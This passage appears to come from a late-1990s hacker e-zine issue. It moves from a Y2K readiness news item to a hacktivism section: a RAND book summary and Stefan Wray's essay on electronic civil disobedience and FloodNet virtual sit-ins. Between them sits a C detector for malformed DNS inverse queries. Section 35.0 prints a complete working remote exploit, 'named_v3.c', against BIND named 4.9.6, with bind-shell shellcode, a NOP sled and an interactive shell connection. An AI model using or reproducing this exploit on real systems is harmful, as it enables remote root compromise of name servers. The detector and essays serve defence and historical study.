"You may have 90 percent of the job done, but it's the last 10 percent, when you get into the real-time world versus hopeful thinking and careful planning, that will give you problems. Anyone who has ever worked in a production environment can tell you that." The biggest problems could stem from what Cheng called "interface issues," when government departments interact with business partners or with the provincial governments, many which are far behind Ottawa in their compliance efforts. "The government has a lot of partners in the public and private sectors, and a lot of them are at different stages of compliance," she said. "That makes it difficult to know for sure, how prepared we really are." "If Canada has an Achilles' heel, it's that we have a lot of people doing things at various levels of government and in the private sector, but we don't have a national Y2K coordinator," Boivin says. "Even if Ottawa is in good shape, there are the provinces -- and the municipalities aren't even at the 50 percent mark in compliance implementation and testing." The Treasury Board of Canada's monthly Y2K progress report will be available on the board's Web site. The auditor general plans a third audit of federal Y2K readiness in June. This time, however, Cheng says that her department will have a special focus on federal contingency plans. @HWA 35.0 More exploits from the ADM crew ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE FROM THE ADM CREW * * named_v3.c improved linux x86 named 4.9.6-REL exploit * by plaguez aka ndubee. 
* thanks to napster, and prym for the shellcode * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define NOP 0x90 #define WAITPORT 10752 char buff[10000]; char c0de[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89" "\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe" "\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66" "\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10" "\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66" "\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89" "\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80" "\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69" "\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07" "\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff"; char shellcode[500]; void handle_alarm(sn) int sn; { alarm(0); signal(SIGALRM, SIG_DFL); printf("Unable to connect: Connection timed out\n"); exit(0); } void addchar(char *str, char ch) { unsigned int len; len = strlen(str); str[len] = ch; str[len + 1] = 0; } int ConnectServer(char *host, int port) { int sockdesc; struct sockaddr_in sin; struct hostent *he; sin.sin_port = htons(port); sin.sin_family = AF_INET; he = gethostbyname(host); if (he) { memcpy((caddr_t) & sin.sin_addr.s_addr, he->h_addr, he->h_length); } else { printf("Error: gethostbyname(): Unable to resolve [%s]\n", host); exit(-1); } if ((sockdesc = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("Error: socket()"); exit(-1); } if (connect(sockdesc, (struct sockaddr *) &sin, sizeof(sin)) < 0) { perror("Error: connect()"); exit(-1); } return sockdesc; } void MultiplexConnection(int sockdesc) { int ret; char sockbuf[2048]; fd_set readfds; while (1) { FD_ZERO(&readfds); FD_SET(0, &readfds); FD_SET(sockdesc, &readfds); select(255, &readfds, 
NULL, NULL, NULL); if (FD_ISSET(sockdesc, &readfds)) { memset(sockbuf, 0, 2048); ret = read(sockdesc, sockbuf, 2048); if (ret <= 0) { printf("Connection closed by foreign host.\n"); exit(-1); } printf("%s", sockbuf); } if (FD_ISSET(0, &readfds)) { memset(sockbuf, 0, 2048); read(0, sockbuf, 2048); write(sockdesc, sockbuf, 2048); } } } int lookup_host(ra, hn, rp) struct sockaddr_in *ra; char *hn; unsigned short rp; { ra->sin_family = AF_INET; ra->sin_port = htons(rp); if ((ra->sin_addr.s_addr = inet_addr(hn)) == -1) { struct hostent *he; if ((he = gethostbyname(hn)) != (struct hostent *) NULL) { memcpy(&ra->sin_addr.s_addr, he->h_addr, 4); return 1; } else herror("Unable to resolve hostname"); } else return 1; return 0; } void attack_bind(ra, loc) struct sockaddr_in ra; char *loc; { int sd, pktlen, sockdesc; char keypkt[6000], rname[6000]; struct hostent *he; if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("cannot open tcp socket"); return; } printf("Connecting to nameserver via TCP.."); fflush(stdout); signal(SIGALRM, handle_alarm); alarm(15); if (connect(sd, (struct sockaddr *) &ra, sizeof(ra)) == -1) { perror("Unable to connect"); close(sd); return; } printf(".done.\n"); alarm(0); if ((he = gethostbyaddr((char *) &ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *) NULL) sprintf(rname, "%s", inet_ntoa(ra.sin_addr)); else strncpy(rname, he->h_name, sizeof(rname)); pktlen = make_keypkt(keypkt); send_packet(sd, keypkt, pktlen); close(sd); printf("Attente connexion...\n"); fflush(stdout); sleep(5); sockdesc = ConnectServer(loc, WAITPORT); printf("Shell found! 
Free to execute commands suffixed with a ';'\n"); MultiplexConnection(sockdesc); close(sockdesc); exit(-1); } int make_keypkt(pktbuf) char *pktbuf; { HEADER *dnsh; char *ptr = pktbuf; int pktlen = 0; unsigned long ttl = 31337; memset(pktbuf, 0, sizeof(pktbuf)); /* fill the dns header */ dnsh = (HEADER *) ptr; dnsh->id = htons(rand() % 65535); dnsh->qr = 0; dnsh->opcode = IQUERY; dnsh->aa = 0; dnsh->tc = 0; dnsh->rd = 1; dnsh->ra = 1; dnsh->unused = 0; /* removed for portability (it's zero already) dnsh->pr = 0; */ dnsh->rcode = 0; dnsh->qdcount = htons(0); dnsh->ancount = htons(1); dnsh->nscount = htons(0); dnsh->arcount = htons(0); pktlen += sizeof(HEADER); ptr += sizeof(HEADER); /* this is the domain name (nothing here) */ *(ptr++) = '\0'; pktlen++; /* fill out the rest of the rr */ PUTSHORT(T_A, ptr); PUTSHORT(C_IN, ptr); PUTLONG(ttl, ptr); PUTSHORT((strlen(buff) + 1), ptr); memcpy(ptr + 1, buff, strlen(buff) + 1); ptr = ptr + (strlen(buff) + 1); pktlen += ((sizeof(short) * 3) + sizeof(long) + (strlen(buff) + 1)); return pktlen; } int send_packet(sd, pktbuf, pktlen) int sd, pktlen; char *pktbuf; { char tmp[2], *tmpptr; tmpptr = tmp; PUTSHORT(pktlen, tmpptr); if (write(sd, tmp, 2) != 2 || write(sd, pktbuf, pktlen) != pktlen) { perror("write failed"); return 0; } return 1; } void usage(char *pname) { printf("\nUsage:\t%s targethost [offset]\n", pname); printf("\ttargethost may either be name or ip.\n\n"); } void main(argc, argv) int argc; char *argv[]; { int i; struct sockaddr_in ra; char *ptr; char *endbuff; unsigned long addr; unsigned char jmp; int offset = 2750; /* 2200 --> 3500 */ int bsize = 1536; if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 3) offset += atoi(argv[2]); strcpy(shellcode, c0de); addr = 0xbffffff0 - offset; printf("longueur shellcode : %i\n", strlen(c0de)); printf("taille buffer %i\n", bsize); printf("offset %i\n", offset); printf("adresse: 0x%lx\n", addr); endbuff = buff + bsize; for (ptr = buff; ptr < (endbuff - strlen(shellcode) - 
8); ptr++) *ptr = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; *((long *) ptr) = addr - 16; *((long *) (ptr + 4)) = addr; *(ptr + 9) = 0; if (!lookup_host(&ra, argv[1], NAMESERVER_PORT)) return; srand(time(NULL)); attack_bind(ra, argv[1]); }

=------------------------------------------------------------------------------------------------=

@HWA

**********************************************************************
*  =--------------------------------------------------------------=  *
*                                                                    *
*     Special Section: Online civil disobedience and hacktivism      *
*                                                                    *
*  =--------------------------------------------------------------=  *
**********************************************************************

SP.00 Intro article
      ~~~~~~~~~~~~~

That Wild, Wild Cyberspace Frontier

Cyberspace, like the old West, is a lawless domain of limitless possibilities--for good but also for evil. As in a frontier town, everyone with links to the Internet is going to have to see to their own protection, at least until law and order catch up.

A Russian hacker in St. Petersburg breaks into a Citibank computer system in New York and steals more than $10 million by electronically transferring the money to other banks around the world. Improbable? Not at all--the only remarkable aspect of the affair is that the hacker was caught and the case became public when Citibank requested his extradition.

Banks try to keep such thefts under wraps because of the bad publicity, but security experts estimate that about 36 instances of computer intruders stealing sums of more than $1 million occur each year in Europe and the United States. And that is just the tip of an iceberg of real and potential, civil and military, deliberate and accidental threats to the global web of interlinked computers and communications systems.
In the headlong rush to "connect," little attention is being paid to gaping holes in the security of these information networks, according to RAND researchers Richard O. Hundley and Robert H. Anderson. "This is everybody's problem, and therefore nobody's problem; it falls through all the cracks," they write in Security in Cyberspace: An Emerging Challenge for Society. The authors provide a tour of the cyberspace frontier and of the "bad guys" and dangers lurking there. They also sketch a plan to bring a modicum of order and security to this chaotic, rapidly expanding, and essentially lawless territory.

From Printed Page to Cyberspace

More and more informational activities are going digital and electronic, they point out, with these versions often supplanting all paper records. This is true of educational activities, the holdings of libraries, the process and results of research, engineering designs and industrial processes, the various mass information and entertainment media (newspapers, television, movies, etc.), and all manner of private and public records.

Also moving from the printed page into cyberspace are transactional activities, involving myriad commercial business and financial transactions, the operations of governments at all levels, political activities, and both public and private social interactions.

Activities involving the operation and control of essential physical and functional infrastructures--power grids, air traffic control systems, telecommunications and the like--are increasingly shifting from mechanical/electrical control to electronic/software control. And the connectivity between information systems that is at the heart of cyberspace is spreading worldwide and becoming more and more universal, with millions of new entry points every year.
These loosely protected information networks can be attacked in a variety of ways, for a variety of purposes, the authors note: to insert false data, to steal, change or destroy data and programs, and to disrupt, manipulate or control a system's performance. Many of these types of attack have already occurred. Two notable examples are the "Internet Worm," which disrupted activities on the Internet in 1988, and the "Hannover Hacker," who stole information from computer files all over the world during 1986-1988 and sold it to the KGB.

All of these hostile actions can be done surreptitiously and many can be done remotely, at a great distance from the target, via a series of interlinked computers.

Malevolent acts are not the only worry; information systems operating in cyberspace can also be brought down unintentionally. Instances of this range from a farmer accidentally cutting a fiber-optic cable while burying a dead cow (which closed four major air-traffic control centers for over five hours in May 1991) to the software error that caused a major breakdown in AT&T long distance service in 1992.

Who Are the Potential Villains?

The explosive expansion of cyberspace activities gives rise to a new set of vulnerabilities--for governments, the military, businesses, individuals and society as a whole--that can be exploited by a wide spectrum of "bad guys" for a variety of motives, Hundley and Anderson contend. These include hackers, disgruntled employees, criminals, terrorists, commercial organizations, and nations.

The case of hacker Kevin Mitnick provides some insight into the first type. He led authorities on a high-speed chase through cyberspace after lifting 20,000 credit card numbers from various computer systems. Mitnick did not try to cash in on the ill-gotten bonanza, apparently more interested in thrills than profits, and was caught only after deliberately provoking the attention of a top computer security expert.
Mitnick hacked into the files of Tsutomu Shimomura, who then tracked him down for authorities. The resources required to cause harm in this cyberspace world are relatively small: one (or at most a few) computer experts with computer terminals hooked into the worldwide network can do considerable damage. The resources required for a nation or group to do significant damage to the military, economy, or society of another nation are larger, but far fewer than those required to acquire and use major weapon systems. The preparations can also be well hidden, if done carefully. As more and more people become "computer smart" and as villains of many different stripes become more and more aware of the opportunities for mayhem in cyberspace, the resources for major attacks could be within the reach of many nations and some malevolent groups. To further complicate matters, cyberspace attacks mounted by these different actors are indistinguishable from each other, as are attacks mounted by domestic and foreign-based perpetrators, insofar as the perceptions of the victims are concerned. The distinction between "crime" and "warfare," "accident" and "attack," becomes blurred as does the distinction between police and military responsibilities. In the authors' view, the danger of more (and more serious) threats in cyberspace is multiplying alarmingly. Statistics support their concern. The number of reported (many incidents go unreported) Internet penetrations rose from six in 1988 to 1,172 in the first six months of 1994. So far, at least, no major disasters have occurred, but the potential certainly exists. For example, it might be possible in the future for some perpetrators (nations or major terrorist groups) to inflict substantial damage by bringing down key parts of the nation's air traffic control system, or the electric power grid, or the international monetary transfer system, even if for a limited time. Nor is a military disaster out of the question. 
If an enemy cyberspace attack disrupted a vital military logistics system, or the telecommunications network on which it depends, for a critical period during a campaign, the campaign could be jeopardized. But taming this wild frontier won't be easy. In addition to the chaotic growth of cyberspace and the blurring of lines of local, national and international authority over activities conducted there, the authors identify another problem. Many individual users neither understand nor accept the need for communal responsibility in safeguarding cyberspace. In suggesting the elements of a strategy for cyberspace security, Hundley and Anderson draw on a familiar metaphor. Like frontier towns, let each local enclave (business, university, research organization, government agency) see to its own protection, at least for the present, relying on available computer security software and firewalls (security strategies that control electronic access by outsiders but allow insiders, who presumably are trustworthy, to travel the information highways and byways with comparative freedom). But these are little more than stopgap measures, the authors conclude. Barring a technological breakthrough that is not now on the horizon, effective control of cyberspace will require a combination of laws, regulations, the education and training of users, and the cooperation of countries worldwide. Security in Cyberspace: An Emerging Challenge for Society, by Richard O. Hundley and Robert H. Anderson, 1994. 
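Seen from the defending side, the named_v3.c listing in section 35.0 above has a simple wire signature: make_keypkt() sets the opcode to IQUERY and attaches a single A record whose RDLENGTH covers the whole padded buffer (bsize is 1536), while a well-formed A record carries 4 bytes of RDATA. The inspector below is an added example, not code from ADM or from this issue; the function names, verdict values and the constructed sample message (zero-filled RDATA) are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DNS_HDR_LEN   12
#define OPCODE_IQUERY 1   /* inverse query opcode (RFC 1035) */
#define TYPE_A        1
#define A_RDLEN       4   /* an IPv4 address is exactly 4 bytes */

enum verdict {
    DNS_OK = 0,             /* not an inverse query, nothing to report */
    DNS_MALFORMED,          /* framing or record lengths do not add up */
    DNS_IQUERY,             /* well-formed inverse query: worth logging */
    DNS_IQUERY_BAD_A_RDLEN  /* inverse query whose A record is not 4 bytes */
};

static unsigned rd16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Return the offset just past the encoded name at off, or 0 on error. */
static size_t skip_name(const uint8_t *m, size_t len, size_t off)
{
    while (off < len) {
        uint8_t l = m[off];
        if (l == 0)
            return off + 1;                         /* root label ends it */
        if ((l & 0xC0) == 0xC0)
            return (len - off >= 2) ? off + 2 : 0;  /* compression pointer */
        if (l & 0xC0)
            return 0;                               /* reserved label type */
        off += 1 + (size_t)l;
    }
    return 0;
}

/* Inspect one DNS message as sent over TCP: 2-byte length, then the message. */
enum verdict inspect_tcp_dns(const uint8_t *buf, size_t buflen)
{
    if (buflen < 2)
        return DNS_MALFORMED;
    size_t mlen = rd16(buf);
    const uint8_t *m = buf + 2;
    if (mlen < DNS_HDR_LEN || mlen > buflen - 2)
        return DNS_MALFORMED;
    unsigned is_response = m[2] >> 7;
    unsigned opcode = (m[2] >> 3) & 0x0F;
    if (is_response || opcode != OPCODE_IQUERY)
        return DNS_OK;

    unsigned qd = rd16(m + 4), an = rd16(m + 6);
    size_t off = DNS_HDR_LEN;
    for (unsigned i = 0; i < qd; i++) {             /* skip any questions */
        off = skip_name(m, mlen, off);
        if (off == 0 || mlen - off < 4)
            return DNS_MALFORMED;
        off += 4;
    }
    enum verdict v = DNS_IQUERY;
    for (unsigned i = 0; i < an; i++) {             /* walk answer records */
        off = skip_name(m, mlen, off);
        if (off == 0 || mlen - off < 10)
            return DNS_MALFORMED;
        unsigned type = rd16(m + off);
        size_t rdlen = rd16(m + off + 8);
        off += 10;
        if (type == TYPE_A && rdlen != A_RDLEN)
            v = DNS_IQUERY_BAD_A_RDLEN;             /* flag even if truncated */
        if (rdlen > mlen - off)
            return (v == DNS_IQUERY_BAD_A_RDLEN) ? v : DNS_MALFORMED;
        off += rdlen;
    }
    return v;
}

/* Constructed sample: TCP-framed inverse query carrying one A record at the
 * root name with rdlen zero bytes of RDATA. Returns total length, 0 if no room. */
size_t build_sample_iquery(uint8_t *out, size_t cap, unsigned rdlen)
{
    size_t mlen = DNS_HDR_LEN + 1 + 10 + (size_t)rdlen;
    if (mlen > 0xFFFF || cap < mlen + 2)
        return 0;
    memset(out, 0, mlen + 2);
    out[0] = (uint8_t)(mlen >> 8); out[1] = (uint8_t)(mlen & 0xFF);
    uint8_t *m = out + 2;
    m[0] = 0x12; m[1] = 0x34;                 /* arbitrary message id */
    m[2] = (OPCODE_IQUERY << 3) | 0x01;       /* QR=0, opcode=IQUERY, RD=1 */
    m[7] = 1;                                 /* ANCOUNT = 1 */
    uint8_t *rr = m + DNS_HDR_LEN + 1;        /* fields after the root name */
    rr[1] = TYPE_A; rr[3] = 1;                /* TYPE = A, CLASS = IN */
    rr[8] = (uint8_t)(rdlen >> 8); rr[9] = (uint8_t)(rdlen & 0xFF);
    return mlen + 2;
}

/* Stand-alone run: exit status 0 when the oversized sample is flagged. */
int main(void)
{
    uint8_t pkt[2048];
    size_t n = build_sample_iquery(pkt, sizeof pkt, 1537);
    return inspect_tcp_dns(pkt, n) == DNS_IQUERY_BAD_A_RDLEN ? 0 : 1;
}
```

A sensor would call inspect_tcp_dns() on each reassembled TCP/53 message and alert on DNS_IQUERY_BAD_A_RDLEN; plain DNS_IQUERY hits are worth logging on servers that have no reason to receive inverse queries.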
SP.01 Article 1:"Electronic Civil Disobedience and the World Wide Web of Hacktivism: "
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Electronic Civil Disobedience and the World Wide Web of Hacktivism:
A Mapping of Extraparliamentarian Direct Action Net Politics
_____________________
Stefan Wray

Source: http://www.freespeech.org/resistance/texts/hacktivism.html

Introduction

In the next century, when cyber-historians look back to the 1990s, they will recognize 1995 as the year of the graphical browser, the year the Internet began to be overshadowed by the Web. But they will probably also view 1998 as an important moment -- in the history of the browser wars. At a minimum, 1998 will be noted for the emergence of two terms that represent similar phenomena: electronic civil disobedience and hacktivism.

In that year, a Net based affinity group called the Electronic Disturbance Theater pushed and agitated for new experimentation with electronic civil disobedience actions aimed mostly at the Mexican government. It engaged its FloodNet software and invited participation to an international set of artists, digerati, and political activists to make a "symbolic gesture" in support of Mexico's Zapatistas. While at the same time, in Britain, in Australia, in India, in China, on almost every continent there were reports of hacktivity.

In the spring of 1998, a young British hacker known as "JF" accessed about 300 web sites and placed anti-nuclear text and imagery. He entered, changed and added HTML code. At that point it was the biggest political hack of its kind. Since then, and increasingly over the course of the year, there were numerous reports of web sites being accessed and altered with political content.
Taken together we may consider both the more symbolic electronic civil disobedience actions and the more tangible hacktivist events under the rubric of extraparliamentarian direct action Net politics, where extraparliamentarian is taken to mean politics other than electoral or party politics, primarily the grassroots politics of social movement.

By no means was 1998 the first year of the browser wars, but it was the year when electronic civil disobedience and hacktivism came to the fore, evidenced by a front page New York Times article on the subject by the end of October. Since then the subject has continued to move through the media sphere. 1

What this paper attempts to do is examine these emerging trends from a slightly wider angled lens. This paper puts forth five portals for consideration: computerized activism, grassroots infowar, electronic civil disobedience, politicized hacking, and resistance to future war. At first they were conceived as five portals into Hacktivism, but perhaps they better serve as five portals for looking at the wider world of extraparliamentarian direct action Net politics, although that phrase is admittedly awkward. Nevertheless, these five portals seem to provide a useful starting point for a more in-depth, yet to come, examination of the convergence of activism, art, and computer-based communication and media.

In addition to starting to define, to frame, and to contextualize contemporary hacktivity, in terms of its roots, its lateral dimension, and its trajectivity, this paper also asks some nascent questions of a political, tactical, technological, ethical, and legal nature and makes some preliminary claims about the likely direction of these various movements.

Computerized Activism

Computerized activism exists at the intersections of politico-social movements and computer-mediated communication. The origins of computerized activism extend back in pre-Web history to the mid 1980s.
As an example, the first version of PeaceNet appeared in early 1986. PeaceNet enabled - really for the first time - political activists to communicate with one another across international borders with relative ease and speed. 2 The advent of newsgroup services like PeaceNet, and wider dispersal of other Bulletin Board Systems, email lists, and gopher sites characterizes the cyber-environment within which most early on-line political activists found themselves. This largely text-based environment persisted up until as late as 1994 and 1995, when the first GUI browsers were introduced. Even today, while Web sites augment these earlier forms, email communication remains a central device in the international circulation of struggle and the creation and maintenance of international solidarity networks.3 During the early to mid 1980s the subject of computer-mediated communication (CMC) was taken up by scholars in, for example, psychology and sociology. When communication scholars began to examine CMC, and in particular when they began to assess the juncture of political communication and CMC, a number of academic treatments of "electronic democracy" were written in which politics is positioned narrowly within the confines of electoral or parliamentarian politics. 4 Among the earliest treatments of CMC from among communication scholars who entertain extraparliamentarian or grassroots politics is by Downing in "Computers for Political Change." 5 Not surprisingly, PeaceNet is one of his case studies. For purposes of tracing the origins of more current cross-border email exchange and its role in creating and maintaining international solidarity networks, Downing points to PeaceNet's establishment of international links in 1987. Among early adopters of these means of communication were people in the 1980s anti-nuclear and Central American solidarity movements. 
By the late 1980s and the very beginning of the 1990s, the significance of cross-border, international, email communication began to be realized. The international role of email communication, coupled to varying degrees with the use of the Fax machine, was highlighted in both the struggles of pro-democracy Chinese students and in broader trans-national movements that led to the dissolution of the Soviet Union. Shortly thereafter, we began to see scholarly work on this subject. Harasim’s "Global Networks: Computers and International Communication" began to theorize about the role of international email communication in linking together the world. 6

Computerized activism remained marginal to political and social movements until the explosion of the Internet in the early to mid 1990s and more so until the arrival of the graphical browser in 1994 and 1995. Now, in the post-Web Internet phase there is widespread use of these media forms by a plethora of grassroots groups and other political actors in countries all over the world. 7

A common thread or understanding that runs through various types of politically based computer-mediated communication, from early BBS systems, to email listservs, and to sophisticated Web sites with fancy bells and whistles, seems to be an overarching dominant paradigm that privileges discourse, dialogue, discussion and open and free access. This observation becomes important when looking more at electronic civil disobedience and politicized hacking, because it is with this dominant paradigm of the Habermasian Web that these later forms conflict and cause friction.

So the first portal of Computerized Activism is important for understanding the roots of today’s extraparliamentarian, more direct action focused, political CMC. It is the portal that has been with us the longest, and the portal within which most political actors on the Net feel the most comfortable.
Computerized activism, defined more purely as the use of the Internet infrastructure as a means for activists to communicate with one another, across international borders or not, is less threatening to power than the other types of uses we see emerging in which the Internet infrastructure is not only a means toward or a site for communication, but the Internet infrastructure itself becomes an object or site for action. This transgression, or paradigmatic shift in thinking, of moving away from seeing the Internet solely as a communication device to seeing it as both a communication device and a site for action is dealt with incrementally in the next four sections.

Grassroots Infowar

Grassroots infowar is an intensification of computerized activism. Infowar here refers to a war of words, a propaganda war. Grassroots infowar is the first step, the first move away from the Internet as just a site for communication and the beginning of the transformation from word to deed. Grassroots infowar actors emerge fully cognizant they are on a global stage, telepresent across borders, in many locations simultaneously. There exists a sense of immediacy and interconnectivity at a global level. More than a mere sharing of information and dialogue, there is a desire to push words towards action. Internet media forms become vehicles for inciting action as opposed to simply describing or reporting. In the early 1990s, following the U.S. directed "smart" bombardment of Iraq and following the dissolution of the Soviet Union and the subsequent uselessness of Cold War rhetoric as a rationalization for foreign intervention, the U.S. military-intelligence community, along with its allies in financial-corporate sectors, needed to craft a new military doctrine. Their answer was Information Warfare and the threat of info-terrorism. 
State-side scholars at RAND, a think tank in Santa Monica, California, that often does the military's "thinking", set about devising new theoretical constructs that would lay the basis for their version of Information Warfare. In 1993, under the RAND banner, Ronfeldt and Arquilla wrote Cyberwar is Coming! This work sets out the distinctions between netwar and cyberwar and is cited by nearly every subsequent treatment of Information Warfare theory.8 Where netwar refers more to the war of words, the propaganda war that exists on the Internet itself, cyberwar refers to cybernetic warfare, war dependent on computers and communications systems, the war of C4I - Command, Control, Communication, Computers, and Information. Not long after RAND's theoretical intervention, pragmatic cases of netwar appeared. Among the most celebrated is the case of Mexico's Zapatistas and the international community of supporters that quickly brought that struggle on to the Internet. With the global pro-Zapatista Internet experience there began to be a rethinking or an interrogation of RAND's theoretical constructs, albeit from a more radical grassroots perspective. Some of this recasting has been brought forth in pieces by Harry Cleaver, a professor at the University of Texas at Austin and key person behind the Chiapas95 project, an email-based news and information distribution service. Probably Cleaver's most well known work in this regard is "The Zapatistas and the Electronic Fabric of Struggle." 9 Despite some radical interventions and attempts to reframe dominant forms of military and intelligence Information Warfare theory, most of the material, not surprisingly, is produced by the likes of RAND, the National Defense University, the Department of Defense, the US Air Force, or private sector initiatives. The meme of Information Warfare seems to have spread and been promulgated largely through network security paranoics and others keen on guarding digital property. 
But there are signs that Information Warfare is spreading to other areas. This year Information Warfare hit the international digital arts community by being the main subject of the annual Ars Electronica Festival in Linz, Austria.9 Theorizing about grassroots or bottom-up Information Warfare doesn't get nearly as much attention as the dominant models and as a consequence there is not much written on the subject. 11 The case of the global pro-Zapatista networks of solidarity and resistance offers a point of departure for further examination of grassroots infowar. One feature of the Zapatista experience over the course of the last 5 years is that it has been a war of words, as opposed to a prolonged military conflict. This is not to say there isn't a strong Mexican military presence in the state of Chiapas. Quite the contrary is true. But fighting technically ended on January 12, 1994 and since then there has been a ceasefire and numerous attempts at negotiation.12 What scholars, activists, and journalists, on both the left and the right, have said is that the Zapatistas owe their survival at this point largely to a war of words. This war of words, in part, is the propaganda war that has been successfully unleashed by Zapatista leaders like Subcomandante Marcos as well as non-Zapatista supporters throughout Mexico and the world. Such propaganda and rhetoric has, of course, been transmitted through more traditional mass communication means, like through the newspaper La Jornada. 13 But quite a substantial component of this war of words has taken place on the Internet. Since January 1, 1994 there has been an explosion of the Zapatista Internet presence in the forms of email Cc: lists, newsgroups, discussion lists, and web sites.14 A primary distinction, then, between earlier forms of computerized activism and forms of grassroots infowar is in the degree of intensity. Coupled with that is the degree to which the participants are noticed and seen as a force. 
Given the Zapatistas' relatively high profile in Mexican society over the course of the last five years, and given the fact that they are technically a belligerent force negotiating with a government, the Internet activity surrounding them takes on a different significance than, say, for example, the Internet activity of the Sierra Club, Amnesty International, or other similar ventures. An important difference is that with grassroots infowar comes the desire to incite action and the ability to do so at a global scale. At the end of 1997, news of the Acteal massacre in Chiapas, in which 45 indigenous people were killed, quickly spread through global pro-Zapatista Internet networks. Within a matter of days there were protests and actions at Mexican consulates and embassies all over the world.15 This incident, too, is now seen as a turning point in the stance by some toward the Internet infrastructure. While prior to this moment there had been few if any incident reports of pro-Zapatista hacktivity, following it there has been a shift, the beginning of the move toward accepting the Internet infrastructure as both a channel for communication and a site for action.

Electronic Civil Disobedience

Acting in the tradition of non-violent direct action and civil disobedience, proponents of Electronic Civil Disobedience are borrowing the tactics of trespass and blockade from these earlier social movements and are experimentally applying them to the Internet. A typical civil disobedience tactic has been for a group of people to physically blockade, with their bodies, the entranceways of an opponent's office or building or to physically occupy an opponent's office -- to have a sit-in. Electronic Civil Disobedience, as a form of mass decentered electronic direct action, utilizes virtual blockades and virtual sit-ins. 
Unlike the participant in a traditional civil disobedience action, an ECD actor can participate in virtual blockades and sit-ins from home, from work, from the university, or from other points of access to the Net. [16] The phrase "Electronic Civil Disobedience" was coined by a group of artists and theorists called the Critical Art Ensemble. In 1994 they published their first book that dealt with this subject, "The Electronic Disturbance," followed two years later by "Electronic Civil Disobedience and Other Unpopular Ideas."16 Both of these works are devoted to a theoretical exploration of how to move protests from the streets onto the Internet. They examine the tactics of street protest, on-the-ground disruptions and disturbance of urban infrastructure and they hypothesize how such practices can be applied to the Internet infrastructure.17 Before 1998, Electronic Civil Disobedience remained largely as theoretical musings. But after the 1997 Acteal Massacre in Chiapas, there was a shift toward a more hybrid position that views the Internet infrastructure as both a means for communication and a site for direct action. This shift distinguishes more sharply the third portal of Electronic Civil Disobedience from the first and second portals. Electronic Civil Disobedience is the first transgression, making Politicized Hacking the second transgression and Resistance to Future War the third. Each succeeding transgression moves the stance toward the Internet infrastructure further away from the public sphere model and casts it more as conflicted territory bordering on a war zone. Where the former more discursive model is perhaps a manifestation of Habermas's Paris Salon, the latter may have roots in the Boston Tea Party. 18 The realization and legitimization of the Internet infrastructure as a site for word and deed opens up new possibilities for Net politics, especially for those already predisposed to extraparliamentarian and direct action social movement tactics. 
In early 1998 a small group calling themselves the Electronic Disturbance Theater had been watching other people experimenting with early forms of virtual sit-ins. The group then created software called FloodNet and on a number of occasions has invited mass participation in its virtual sit-ins against the Mexican government. 19 EDT members Carmin Karasic and Brett Stalbaum created FloodNet to direct a "symbolic gesture" against an opponent's web site. FloodNet is a Web-based Java applet that repeatedly sends browser reload commands.20 In theory, when enough EDT participants are simultaneously pointing the FloodNet URL toward an opponent site, a critical mass prevents further entry. In practice, this has rarely been attained. Given this, perhaps FloodNet's power lies more in the simulated threat. On September 9, 1998, EDT exhibited its SWARM project21 at the Ars Electronica Festival on Information Warfare, where it launched a three-pronged FloodNet disturbance against web sites of the Mexican presidency, the Frankfurt Stock Exchange, and the Pentagon, to demonstrate international support for the Zapatistas, against the Mexican government, against the U.S. military, and against a symbol of international capital.22 But within several hours of activating project SWARM, FloodNet was disabled. On web browsers Java coffee cups streamed quickly across the bottom of the screen and FloodNet froze. Participants began to send email with word of trouble. Later that day a Wired writer learned from a Department of Defense spokesperson that the DOD had taken some steps against FloodNet. At the same time, an EDT co-founder received email that the Defense Information Systems Agency had complained about his ECD web site content.23 Globally, 20,000 connected to the FloodNet browser on September 9 and 10. This action reverberated through European media. It was later picked up by Wired, ZDTV, Defense News, and National Public Radio, among others. 
On October 31, EDT made the front page of the New York Times. The story continued to unfold. More interest from the media sphere. On November 22, EDT called for FloodNet against the School of the Americas.24 As part of EDT's grand finale for the 1998 season, the group plans to release a public version of FloodNet at 12:01 a.m. on January 1, 1999.

Politicized Hacking

